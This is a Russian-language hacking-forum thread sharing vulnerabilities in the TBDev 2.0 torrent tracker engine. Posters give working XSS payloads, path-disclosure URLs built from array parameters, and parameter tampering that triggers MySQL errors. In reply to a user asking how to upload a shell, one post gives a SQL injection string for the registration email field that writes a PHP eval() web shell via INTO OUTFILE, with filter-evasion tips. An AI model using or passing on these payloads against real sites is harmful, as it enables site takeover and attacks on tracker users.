Трекер-движок TBDev 2.0

Discussion in 'Веб-уязвимости' started by Qwazar, 5 Aug 2008.

  1. Kpeamop

    Kpeamop Member

    Joined:
    4 Jan 2007
    Messages:
    24
    Likes Received:
    10
    Reputations:
    0
    насколько я помню речь шла не о каком-то коде взятом из головы, а именно из usersearch.php, а там все в ""

    пример:
    PHP:
    value="<?=$_GET['ip']?>"
    поэтому будет не так :
    Code:
    <table name=1 onMouseOver=alert(/aaa/)><tr><td>test</td></tr></table> 
    а так:
    Code:
    <table name="1 onMouseOver=alert(/aaa/)"><tr><td>test</td></tr></table> 
    и я не соглашусь с тобой, что этот код вреден.
     
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Kpeamop, я и написал что как хот-фикс он подойдёт, для конкретно этого файла. Но если в нём что нибудь поменяют, этот код может перестать защищать. И само собой, в общем случае, на такой код полагаться нельзя.

    З.Ы.
    К слову, в TBDev мест где в тегах не используются кавычки - *опой жуй.
     
  3. Kpeamop

    Kpeamop Member

    Joined:
    4 Jan 2007
    Messages:
    24
    Likes Received:
    10
    Reputations:
    0
    без кавычек - не спорю, а так вполне достаточно надежный.
     
  4. Yuna

    Yuna Member

    Joined:
    22 Jun 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    12
    +
    ->
    не эффективно

    два - у тебя хрень такая - name="something[]" и так несколько чекбоксов - на выходе этого МАССИВА НЕ БУДЕТ
     
  5. Kpeamop

    Kpeamop Member

    Joined:
    4 Jan 2007
    Messages:
    24
    Likes Received:
    10
    Reputations:
    0
    2 Yuna, *scratch* ты это, с кем говорил?
     
    #205 Kpeamop, 15 Aug 2009
    Last edited: 15 Aug 2009
  6. Stinside

    Stinside Member

    Joined:
    1 May 2009
    Messages:
    44
    Likes Received:
    42
    Reputations:
    5
    Давно уже не работает вообще-то.
     
    1 person likes this.
  7. Yuna

    Yuna Member

    Joined:
    22 Jun 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    12
    что давно не работает? вы хоть понимаете зачем нужна такая конструкция? или смысл моего поста
     
    1 person likes this.
  8. ZonD80

    ZonD80 New Member

    Joined:
    29 Oct 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Ребят, хватит юну мучать, он прекрасно знает, где и какие дырки.

    Давайте меня помучайте: http://dev.kinokpk.com/releases/Kinokpk.com_releaser_v.2.70.7z
     
  9. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Для таких обращений есть специальный раздел :)

    Тут выкладывают то что сами нашли.
     
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    КЫСС (XSS)
    PHP:
    <form action="<?=$PHP_SELF;?>" method="get" name="form1">
    http://127.0.0.1/treker/formats.php/%22%3E%3Cscript%3Ealert(/hi/);%3C/script%3E
     
    _________________________
    #210 HAXTA4OK, 22 Aug 2009
    Last edited: 24 Dec 2009
    2 people like this.
  11. Dflbv

    Dflbv New Member

    Joined:
    4 May 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    что можно сделать если есть доступ к директорскому аку но нету доступа к админке (к блокам) как можно шелл залить?
     
  12. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Если у юзера в mysql есть права на запись,то в регистрации например вместо email вписываешь
    Code:
    '+union+select+'<? eval($a); ?>'+into+otfile+'C:/blablabla/1.php'/*
    Вместо eval можно окно для загрузки,кто-то выкладывал вроде.
    Вместо blablabla пишешь путь который тебе нужен,взять можно из ошибки. Например
    Или в начале темы там выкладывали раскрытия путей.
    У меня было один раз что "+" не катил,заменял на /**/.Так же если комментарий "/*" не катит,заменяй на -- или #
     
  13. Yuna

    Yuna Member

    Joined:
    22 Jun 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    12
    этот баг закрыт ваще-то уже...

    ZonD80, а ты че? :) делай тему =))) может я еще не все знаю? :)
     
    1 person likes this.
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    тема тухнет ,вроде небыло этого раскрытия путей )))

    http://127.0.0.1/treker/log.php?type[]=

    http://127.0.0.1/treker/friends.php?action=delete&type[]=&targetid=2

    http://127.0.0.1/treker/browse.php?search[]=&incldead=0&cat=0

    какие баян напишите плиз =) а то все 21 страниц заново смареть лень :confused:
     
    _________________________
    #214 HAXTA4OK, 26 Aug 2009
    Last edited: 26 Aug 2009
  15. vano793

    vano793 New Member

    Joined:
    7 Dec 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    1

    Вот эта и на Kinokpk.com releaser
    PHP:
    http://127.0.0.1/treker/log.php?type[]=
     
  16. Dflbv

    Dflbv New Member

    Joined:
    4 May 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    раскрытие путей
    /testip.php?ip=>
     
  17. Yuna

    Yuna Member

    Joined:
    22 Jun 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    12
    С форумом простились, аминь!

    Мелкие пакости правки, и прочее прочее прочее:

    1. Переведены языковые файлики на ArrayAccess.
    2. Блокировка скрипта если включен regsiter_globals или не забитыми всяким хламом переменными
    3. Привязка кукисов к подсети 255.255.0.0
    4. Еще всякие мелочки, кому надо - diff в помощь

    http://bit-torrent.kiev.ua/downloads.php?do=file&id=25
     
  18. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Собственно,понятия не имею было,или небыло,но когда рылся в коде дивжка,для самообразования,нашол:
    PHP:
    http://target.com/rss.php?feed=dl&cat=31&passkey[]=
    Раскрытие путей.
     
  19. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    И еще,незнаю будет ли работать гдето еще,ибо нет желания тестировать,но трекеры в моей локальной сети точно подвержены:
    PHP:
    http://good73.net/getrss.php 
    При нажатии сабмита имеем POST данные:
    PHP:
    cat%5B%5D=22&cat%5B%5D=20&cat%5B%5D=12&feed=web&login=passkey
    Так вот,если просто повторить запрос,использовав при этом urlencode()(как в примере),получим раскрытие путей:
    PHP:
    Warningimplode() [function.implode]: Invalid arguments passed in /usr/local/www/target.com/getrss.php on line 56
     
  20. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Извиняюсь что в несколько постов,просто в данный момент пишу с нетбука,который очень меня напрягает.
    Все знают,про такую кнопку как "Спасибо",так вот,сабмитим ее,и имеем POST-данные вида:
    PHP:
    torrentid=33042&ajax=yes
    Создаем в качестве ajax,массив,с темже именем,то есть:
    PHP:
    torrentid=33042&ajax[]=yes
    Меня выкидывало на ошибку MySQL.Незнаю,возможно есть шанс раскрутить в скулю,но я в этом не силен.Это я оставлю на ваш тест :)